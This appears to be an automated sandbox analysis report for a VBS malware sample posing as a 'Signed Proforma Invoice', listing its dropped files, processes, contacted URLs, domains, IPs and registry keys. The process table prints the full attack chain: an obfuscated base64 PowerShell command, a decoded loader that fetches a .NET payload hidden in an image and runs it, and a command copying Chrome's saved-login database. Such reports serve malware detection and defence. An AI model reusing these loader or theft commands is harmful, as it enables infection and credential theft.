Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Signed Proforma Invoice 3645479_pdf.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\DB1
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrv.ini
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K2No9[1].txt
|
Unicode text, UTF-8 text, with very long lines (11695), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dakv42rg.cxz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djjqv0ry.pay.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2zg2vvi.aku.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuysriqt.cbw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogim.jpeg
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024,
components 3
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrg.ini
|
Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHcDgTreQgBVDgTreGcDgTrecDgTreDgTre2DgTreHEDgTreeQBzDgTreEYDgTreNQDgTre4DgTreGkDgTreSgBBDgTreCEDgTrePQB5DgTreGUDgTreawBoDgTreHQDgTredQBhDgTreCYDgTreMgDgTrexDgTreDEDgTreMQDgTreyDgTreCUDgTreMDgTreDgTre4DgTreDEDgTreNgDgTre4DgTreEMDgTreMwBDDgTreDQDgTreRgDgTrezDgTreDYDgTreRgDgTre2DgTreEUDgTreNDgTreDgTre9DgTreGQDgTreaQBzDgTreGUDgTrecgDgTre/DgTreGQDgTreYQBvDgTreGwDgTrebgB3DgTreG8DgTreZDgTreDgTrevDgTreG0DgTrebwBjDgTreC4DgTreZQB2DgTreGkDgTrebDgTreDgTreuDgTreGUDgTredgBpDgTreHIDgTreZDgTreBlDgTreG4DgTrebwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820',
'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth'
, 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\explorer.exe
|
C:\Windows\Explorer.EXE
|
|
|
|
C:\Windows\SysWOW64\colorcpl.exe
|
"C:\Windows\SysWOW64\colorcpl.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
www.lunazone.us/m07a/
|
|
||
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
|
104.21.45.138
|
|
|
|
http://www.msaway.com/m07a/
|
217.160.0.95
|
|
|
|
http://www.xasvcd.xyz/m07a/
|
203.161.57.217
|
|
|
|
http://www.welqi.com/m07a/www.propertiesfinance.com
|
unknown
|
||
|
https://aka.ms/odirmr
|
unknown
|
||
|
http://www.balancceer.top/m07a/
|
unknown
|
||
|
http://www.xasvcd.xyz
|
unknown
|
||
|
http://www.welqi.com/m07a/
|
unknown
|
||
|
http://www.propertiesfinance.com/m07a/
|
unknown
|
||
|
http://www.msaway.comReferer:
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.qdaoxingsujiao.com/m07a/www.workproapi.site
|
unknown
|
||
|
https://api.msn.com:443/v1/news/Feed/Windows?
|
unknown
|
||
|
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
|
unknown
|
||
|
http://www.matchuplover.com/m07a/
|
unknown
|
||
|
http://www.matchuplover.com
|
unknown
|
||
|
http://www.auralights.store/m07a/
|
unknown
|
||
|
http://www.auralights.store
|
unknown
|
||
|
https://excel.office.com
|
unknown
|
||
|
http://www.auralights.storeReferer:
|
unknown
|
||
|
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
|
unknown
|
||
|
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
|
unknown
|
||
|
http://www.potentpolitics.com/m07a/www.welqi.com
|
unknown
|
||
|
http://www.royal-buttons.com
|
unknown
|
||
|
http://www.msaway.com
|
unknown
|
||
|
http://www.balancceer.top
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
|
unknown
|
||
|
http://www.shakishaskakes.com/m07a/
|
unknown
|
||
|
http://www.balancceer.top/m07a/www.auralights.store
|
unknown
|
||
|
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
http://www.welqi.comReferer:
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://www.lunazone.usReferer:
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.shakishaskakes.com/m07a/www.xasvcd.xyz
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
http://www.autoitscript.com/autoit3/J
|
unknown
|
||
|
https://paste.ee/d/K2No9qSh
|
unknown
|
||
|
https://wns.windows.com/L
|
unknown
|
||
|
https://word.office.com
|
unknown
|
||
|
https://mozilla.org0/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
|
unknown
|
||
|
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
|
unknown
|
||
|
http://schemas.micr
|
unknown
|
||
|
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
|
unknown
|
||
|
http://www.potentpolitics.comReferer:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.qdaoxingsujiao.com
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
|
unknown
|
||
|
http://www.potentpolitics.com/m07a/
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
|
unknown
|
||
|
https://lesferch.github.io/DesktopPic
|
unknown
|
||
|
https://www.rd.com/list/polite-habits-campers-dislike/
|
unknown
|
||
|
https://android.notify.windows.com/iOS
|
unknown
|
||
|
http://www.nacob.top
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
|
unknown
|
||
|
https://outlook.com_
|
unknown
|
||
|
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
|
unknown
|
||
|
http://www.lunazone.us/m07a/www.balancceer.top
|
unknown
|
||
|
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
|
unknown
|
||
|
http://www.apexu.xyz/m07a/www.nacob.top
|
unknown
|
||
|
http://www.workproapi.site/m07a/
|
unknown
|
||
|
http://schemas.mi
|
unknown
|
||
|
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
|
unknown
|
||
|
https://powerpoint.office.comcember
|
unknown
|
||
|
http://www.royal-buttons.comReferer:
|
unknown
|
||
|
http://www.yipaijihejiaoyu.comReferer:
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://schemas.micro
|
unknown
|
||
|
http://www.qdaoxingsujiao.comReferer:
|
unknown
|
||
|
http://www.yipaijihejiaoyu.com/m07a/
|
unknown
|
||
|
http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyz
|
unknown
|
||
|
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
|
unknown
|
||
|
http://www.apexu.xyz
|
unknown
|
||
|
http://www.yipaijihejiaoyu.com
|
unknown
|
||
|
http://www.propertiesfinance.comReferer:
|
unknown
|
||
|
http://www.auralights.store/m07a/www.potentpolitics.com
|
unknown
|
||
|
http://www.matchuplover.comReferer:
|
unknown
|
||
|
http://www.xasvcd.xyzReferer:
|
unknown
|
||
|
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
|
unknown
|
||
|
http://www.qdaoxingsujiao.com/m07a/
|
unknown
|
||
|
https://api.msn.com/q
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://paste.ee/d/K2No95
|
unknown
|
||
|
http://www.nacob.top/m07a/www.matchuplover.com
|
unknown
|
||
|
http://www.royal-buttons.com/m07a/
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
lunazone.us
|
3.33.130.190
|
|
|
|
www.msaway.com
|
217.160.0.95
|
|
|
|
uploaddeimagens.com.br
|
104.21.45.138
|
|
|
|
www.xasvcd.xyz
|
203.161.57.217
|
|
|
|
www.lunazone.us
|
unknown
|
|
|
|
www.shakishaskakes.com
|
unknown
|
|
|
|
dual-spov-0006.spov-msedge.net
|
13.107.139.11
|
||
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
paste.ee
|
172.67.187.200
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.211.108
|
||
|
onedrive.live.com
|
unknown
|
||
|
htdgia.db.files.1drv.com
|
unknown
|
There are 2 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.45.138
|
uploaddeimagens.com.br
|
United States
|
|
|
|
203.161.57.217
|
www.xasvcd.xyz
|
Malaysia
|
|
|
|
3.33.130.190
|
lunazone.us
|
United States
|
|
|
|
217.160.0.95
|
www.msaway.com
|
Germany
|
|
|
|
172.67.187.200
|
paste.ee
|
United States
|
||
|
13.107.139.11
|
dual-spov-0006.spov-msedge.net
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
